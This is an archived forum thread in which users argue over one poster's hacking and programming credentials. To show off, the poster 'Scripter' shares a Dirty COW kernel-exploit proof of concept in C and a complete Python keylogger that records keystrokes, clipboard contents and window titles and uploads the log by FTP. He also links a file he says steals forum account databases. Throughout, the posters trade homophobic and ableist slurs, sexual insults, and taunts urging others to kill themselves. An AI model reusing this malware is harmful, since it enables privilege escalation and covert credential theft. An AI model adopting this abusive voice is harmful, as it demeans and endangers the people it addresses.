Netcees

Netcees (http://netcees.org/index.php)
-   Discussion Board (http://netcees.org/forumdisplay.php?f=4)
-   -   Did bags die of aids yet? (http://netcees.org/showthread.php?t=141489)

Scripter 01-18-2020 10:42 AM

Quote:

Originally Posted by Sharp (Post 753870)
(citation needed)

"Did the guy that invented college go to college?"

Hopsin

Sharp 01-18-2020 12:33 PM

Ah, so you're a genius except in any demonstrable way

Scripter 01-18-2020 12:40 PM

Quote:

Originally Posted by Sharp (Post 753876)
Ah, so you're a genius except in any demonstrable way

Youre just the retard late for the party
Did we ask Jimbo what he thought yet?

Kill Spree 01-18-2020 01:11 PM

Quote:

Originally Posted by Scripter (Post 753877)
Youre just the retard late for the party
Did we ask Jimbo what he thought yet?

SHUT THE FUCK UP FAGGOT

~RustyGunZ~ 01-18-2020 01:27 PM

He went from master hacker to 16 yo cringe troll in a quick minute

Scripter 01-18-2020 01:46 PM

Quote:

Originally Posted by Kill Spree (Post 753879)
SHUT THE FUCK UP FAGGOT

Dude you keep talking homo

Scripter 01-18-2020 01:46 PM

Quote:

Originally Posted by Spleth (Post 753881)
He went from master hacker to 16 yo cringe troll in a quick minute

Oh yeah how is that mr im a fucking expert stupid ass fucker
You faggots are forever fantasying about who I am.

Bro why dont you tell me something I dont know faggot cmon...

what does nop mean?

Cmon homo youre so fucking elite

how bout cmp? that should be an easy one

dumb fag.....

how bout 00000100
what does it equal?

If you cant answer any of those questions you need to keep your brothers dick in your mouth.

And you hold yourself as some kind of brain lord. Yeah... sucking loads of cock...

Sharp 01-18-2020 02:08 PM

Scripter seems like the kind of guy to quit his job to focus on learning how to count binary on his hands full time

Scripter 01-18-2020 02:28 PM

Quote:

Originally Posted by Sharp (Post 753884)
Scripter seems like the kind of guy to quit his job to focus on learning how to count binary on his hands full time

Wow brilliant...
Did you think that up all by yourself?

Scripter 01-18-2020 02:33 PM

Quote:

Originally Posted by Spleth (Post 753881)
He went from master hacker to 16 yo cringe troll in a quick minute

Here is something you should be able to relate to moooo


Code:

#include <pthread.h>
#include <sys/stat.h>
#include <string.h>

void *map;
void *writeThread(void *arg);
void *madviseThread(void *arg);

int main(int argc, char *argv[])
{
  pthread_t pth1,pth2;
  struct stat st;
  int file_size;

  // Open the target file in the read-only mode.
  int f=open("/myfile", O_RDONLY);

  // Map the file to memory using MAP_PRIVATE.
  fstat(f, &st);
  file_size = st.st_size;
  map=mmap(NULL, file_size, PROT_READ, MAP_PRIVATE, f, 0);

  // Find the position of the target area
  char *position = strstr(map, "222222");                       

  // We have to do the attack using two threads.
  pthread_create(&pth1, NULL, madviseThread(file_size), (void  *)file_size);
  pthread_create(&pth2, NULL, writeThread(file_size), position);           

  // Wait for the threads to finish.
  pthread_join(pth1, NULL);
  pthread_join(pth2, NULL);
  return 0;
}

void *writeThread(void *arg)
{
  char *content= "******";
  off_t offset = (off_t) arg;

  int f=open("/proc/self/mem", O_RDWR);
  while(1) {
    // Move the file pointer to the corresponding position.
    lseek(f, offset, SEEK_SET);
    // Write to the memory.
    write(f, content, strlen(content));
  }
}

void *madviseThread(void *arg)
{
  int file_size = (int) arg;
  while(1){
      madvise(map, file_size, MADV_DONTNEED);
  }
}


Sharp 01-18-2020 02:43 PM

Got me dude

Spree, Seth, and I talked for hours to come up with that one

Scripter 01-18-2020 02:48 PM

Quote:

Originally Posted by Sharp (Post 753891)
Got me dude

Spree, Seth, and I talked for hours to come up with that one

So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

Scripter 01-18-2020 03:13 PM

I swear to god these homos just dont know
I dont care
its odd that these dodos dont go
kill themselves
instead feel themselves
aren't fly and wont go
jump off a ledge
still in populus
homologous of a lemmings best
so hard ta guess
which is the dumbest dont know...

~RustyGunZ~ 01-18-2020 03:54 PM

Lol you would flex a dirty cow script

Fuckin script kiddie

Zuo 01-18-2020 04:59 PM

Quote:

Originally Posted by Scripter (Post 753892)
So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

What’s good ma boy?!!!!

I see you ballin in that avator jaja beast

Sharp 01-18-2020 06:20 PM

Quote:

Originally Posted by Scripter (Post 753892)
So a whole 3 brain cells was all it took amazing...
sharp lmao dull at best

Bruh

That wp is deadly

Have you signed up for 1-2?

Diode 01-18-2020 11:38 PM

This person is literally 11.

Dope girl 01-18-2020 11:44 PM

It's over
Thread closed

Scripter 01-19-2020 06:42 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753894)
Lol you would flex a dirty cow script

Fuckin script kiddie

Who was flexing retard... lmao
I was just giving you something you could relate tool... and obviously I was right tool lol
Yeah thats why my name is scripter youre my kiddies
Yall are nothing but a bunch of posers.
I bet it took you awhile to even figure out what it was lol

Scripter 01-19-2020 06:53 AM

Quote:

Originally Posted by Zuo (Post 753895)
What’s good ma boy?!!!!

I see you ballin in that avator jaja beast

Quote:

Originally Posted by Sharp (Post 753896)
Bruh

That wp is deadly

Have you signed up for 1-2?

lmao I know right an that was a quip, a five second response

Witty 01-19-2020 06:59 AM

Wow imagine what you could do with days of preparation!

I mean, you already killed Sharp...or should I say Dull. He's done, no coming back.

Now go and destroy the rest of these pussies.

Witty 01-19-2020 07:03 AM

Silver? Lmao copper, nickel, and zinc at best.

Scripter 01-19-2020 07:07 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753894)
Lol you would flex a dirty cow script

Fuckin script kiddie

changes his name to da brayn lord
and now we all know who gives the best head in this piece...

Scripter 01-19-2020 07:18 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753894)
Lol you would flex a dirty cow script

Fuckin script kiddie

Tell me something about this. After all its your death...


https://drive.google.com/open?id=1jH...rmqUXNIGa6uXEn

See this is very common in things like BB forums, this is how they steal every account in your database.

wanna ca che me outside lmfao?



Im sorry youre use to stuff more like this lol

Code:

from ctypes import *


import pythoncom

import pyHook

import win32clipboard

from ftplib import FTP
import threading

user32 = windll.user32

kernel32 = windll.kernel32

psapi = windll.psapi

current_window = None

try:
f=open("C:\loggy\out.txt","r")
except:

f=open("C:\loggy\out.txt","a+")
f.close()

#send current recorded file
def send():
global swit
swit=1
while(swit):
try:
ft = FTP('10.42.0.1')
ft.login('l','f')
filename="sent.txt"
fn=open("C:\loggy\out.txt","r")
ft.storbinary('STOR '+filename,fn)
ft.quit()
fn.close()
swit=0
except:
swit=1

thr = threading.Thread(target=send)
thr.start()

def get_current_process():

f=open("C:\loggy\out.txt","a+")
# get a handle to the fore ground window

hwnd = user32.GetForegroundWindow()

# find the process ID

pid = c_ulong(0)

user32.GetWindowThreadProcessId(hwnd,byref(pid))

# store the current process ID

process_id = "%d" % pid.value

# grab the executable

executable = create_string_buffer("\x00" * 512)

h_process = kernel32.OpenProcess(0x400 | 0x10, False, pid)

psapi.GetModuleBaseNameA(h_process,None,byref(executable),512)

# now read its title

window_title = create_string_buffer("\x00" * 512)

length = user32.GetWindowTextA(hwnd, byref(window_title), 512)

# print out the header if we're in the right process

print

f.write("[ PID: %s - %s - %s ]" % (process_id, executable.value, window_title.value))

print

f.close()

# close handles

kernel32.CloseHandle(hwnd)

kernel32.CloseHandle(h_process)

def KeyStroke(event):

global current_window

# check to see if target changed windows

if event.WindowName != current_window:

current_window = event.WindowName

get_current_process()

f=open("C:\loggy\out.txt","a+")
# if they passed a standard key

if event.Ascii > 32 and event.Ascii < 127:

f.write(chr(event.Ascii))
print chr(event.Ascii),

else:

# if [Ctrl-V], get the value on the clipboard

if event.Key == "V":

win32clipboard.OpenClipboard()

pasted_value = win32clipboard.GetClipboardData()

win32clipboard.CloseClipboard()

f.write(pasted_value)
#print "[PASTE] - %s" % (pasted_value),

else:

if event.Key=="Space":
f.write(' ')
if event.Key=="Return":
f.write('\n')
if event.Key=="back":
f.write('\b')
if event.Key=="Up":
f.write("")
if event.Key=="Down":
f.write("")
if event.Key=="Left":
f.write("")
if event.Key=="Right":
f.write("")

if event.Key=="Lcontrol":
f.write("[Ctrl]")

print "[%s]" % event.Key,

# pass execution to next hook registered

f.close()
return True

# create and register a hook manager

kl = pyHook.HookManager()

kl.KeyDown = KeyStroke
# register the hook and executne forever

kl.HookKeyboard()

pythoncom.PumpMessages()
f.close()


~RustyGunZ~ 01-19-2020 08:03 AM

Idk why you just keep posting incoherent nonsense dude lol

Good job you can copy paste the most well known exploit scripts while only gathering enough actual knowledge over what you say is like 2 decades to make a maze game hahah

Scripter 01-19-2020 08:51 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753932)
Idk why you just keep posting incoherent nonsense dude lol

Good job you can copy paste the most well known exploit scripts while only gathering enough actual knowledge over what you say is like 2 decades to make a maze game hahah

First its incoherent, than its the most well known and then some how the maze game I built in 2 hours relates...
Now if we were talking about the way you create sentences when you try to speak then incoherent would make lots of sense here lol.
I kinda thought I heard you say
"I'm not sure what any of that stuff is so I will ramble utter nonsense to deflect the fact that I am spewing utter nonsense and then call it utter nonsense... I am so genius"... lmfao the genius part could been you saying "I like penis" im not sure yet... lmao


Oh an tell @Silver id like to get in his friends honeypot dwamn

Dope girl 01-19-2020 08:57 AM

Look don't get it twisted I'm a she
and bags is Ghost

~RustyGunZ~ 01-19-2020 09:02 AM

Quote:

Originally Posted by Scripter (Post 753935)
First its incoherent, than its the most well known and then some how the maze game I built in 2 hours relates...
Now if we were talking about the way you create sentences when you try to speak then incoherent would make lots of sense here lol.
I kinda thought I heard you say I'm not sure what any of that stuff is... lmfao


Oh an tell @Silver id like to get in his friends honeypot dwamn

Let me break it down for you homie faggot

The code isn’t incoherent, the way you fail to tie together anything you say into one narrative is.

Your stupid maze game relates because it’s the only code you’ve posted that is actually something you wrote (maybe not even)

If you had any talent with programming and cs concepts you wouldn’t be posting what you’ve been posting. You don’t actually work in the industry or have real skills. You’re a hobbyist and not even a high level one.

If Silvers friend you’re referring to is any black women that account has posted it is in fact Silver herself (allegedly) who is an actual certified legal retard (confirmed)

Dope girl 01-19-2020 09:07 AM

Look
 
Quote:

Originally Posted by Da Brayn Lord (Post 753937)
Let me break it down for you homie faggot

The code isn’t incoherent, the way you fail to tie together anything you say into one narrative is.

Your stupid maze game relates because it’s the only code you’ve posted that is actually something you wrote (maybe not even)

If you had any talent with programming and cs concepts you wouldn’t be posting what you’ve been posting. You don’t actually work in the industry or have real skills. You’re a hobbyist and not even a high level one.

If Silvers friend you’re referring to is any black women that account has posted it is in fact Silver herself (allegedly) who is an actual certified legal retard (confirmed)

Look you get your facts straight Don't be calling me names you don't know me like that

~RustyGunZ~ 01-19-2020 09:11 AM

I was there Roro. I’ve seen you and all God made you to be.
@Ghost1

Scripter 01-19-2020 09:12 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753937)
Let me break it down for you homie faggot

The code isn’t incoherent, the way you fail to tie together anything you say into one narrative is.

Your stupid maze game relates because it’s the only code you’ve posted that is actually something you wrote (maybe not even)

If you had any talent with programming and cs concepts you wouldn’t be posting what you’ve been posting. You don’t actually work in the industry or have real skills. You’re a hobbyist and not even a high level one.

If Silvers friend you’re referring to is any black women that account has posted it is in fact Silver herself (allegedly) who is an actual certified legal retard (confirmed)

Wow there is no lengths you wouldn't go to huh...
Bro you can look at my linkedin page dumb fuck I am everything I said I was and worked as an IA for HP. Everything I said was 100% true and I have a bachelors degree in game engine development. I also have credits under computer network administration as well as application development. Your accusations are weak bro. Show me something you've done. Because it don't make sense to get judged by some moron who obviously don't know his ass from a hole in the ground.

and hating on silver like that just shows you will stop at no lengths to hide the fact that you are a certified idiot.

Dude click the link in my sig moron lmao really... you think game engine development ain't shit...
I created all that stuff and a lot more. Bro just quit cause I know you have nothing to show anyone.

~RustyGunZ~ 01-19-2020 09:21 AM

Just checked it out bro lmao

I don’t see either of those there. I see two jobs you couldn’t keep for more than 6 months and lots of self employment which tells the story plenty.

Also the college you have listed is closed down. So either you are lying about it and using its current status to trick people or you went to a school that wasn’t good enough to stay in business lol.

Am I supposed to be impressed?!

Gone @ game dev degrees even at good schools though

~RustyGunZ~ 01-19-2020 09:24 AM

When I’m off mobile I’ll post something and take out my comments and see if you can tell what it is

Scripter 01-19-2020 09:32 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753943)
When I’m off mobile I’ll post something and take out my comments and see if you can tell what it is

You can belittle fact or put your money where you mouth otherwise just stfu pussy. Its obvious to you me you have no degree of any sort.
You are just stalling now....
so fucking fake....
and if you have any friends its a fucking miracle, cause you're that narcissistic asshole who would throw any of his friends under the bus if it helps your position in any sense.

~RustyGunZ~ 01-19-2020 09:36 AM

Only thing fake is your bachelors degree dog lmao

You would’ve posted that instead of a random proprietary language cert if you actually had one

Scripter 01-19-2020 09:40 AM

Quote:

Originally Posted by Da Brayn Lord (Post 753945)
Only thing fake is your bachelors degree dog lmao

You would’ve posted that instead of a random proprietary language cert if you actually had one

Glad you said that dawg. you are so stupid...

Does it look fake to you moron lol

https://i.ibb.co/7QHZttn/1661049-817...18484923-n.jpg


https://i.ibb.co/dWWtK3M/11217663-11...65376191-n.jpg

Whos fake now faggot?

https://i.ibb.co/g6rkSQS/48411116-24...45521408-n.jpg
Im not sure what this retard is trying to say...

My personal lib
https://i.ibb.co/XVXx8D5/75534797-30...89066496-n.jpg

but you'll continue to talk your bullshit...





...

~RustyGunZ~ 01-19-2020 11:13 AM

I thought you said you build game engines so why do you use Unity lmao?

Dope girl 01-19-2020 11:32 AM

No offense but This is worse than fussing about who got the highest IQ

Kill Spree 01-19-2020 12:06 PM

Quote:

Originally Posted by I got shine (Post 753955)
No offense but This is worse than fussing about who got the highest IQ

You so right

~RustyGunZ~ 01-19-2020 12:20 PM

Quote:

Originally Posted by I got shine (Post 753955)
No offense but This is worse than fussing about who got the highest IQ

So right

My bad ro


All times are GMT -4. The time now is 12:13 PM.

Powered by vBulletin® Version 3.8.5
Copyright ©2000 - 2025, Jelsoft Enterprises Ltd.
User Alert System provided by Advanced User Tagging (Lite) - vBulletin Mods & Addons Copyright © 2025 DragonByte Technologies Ltd.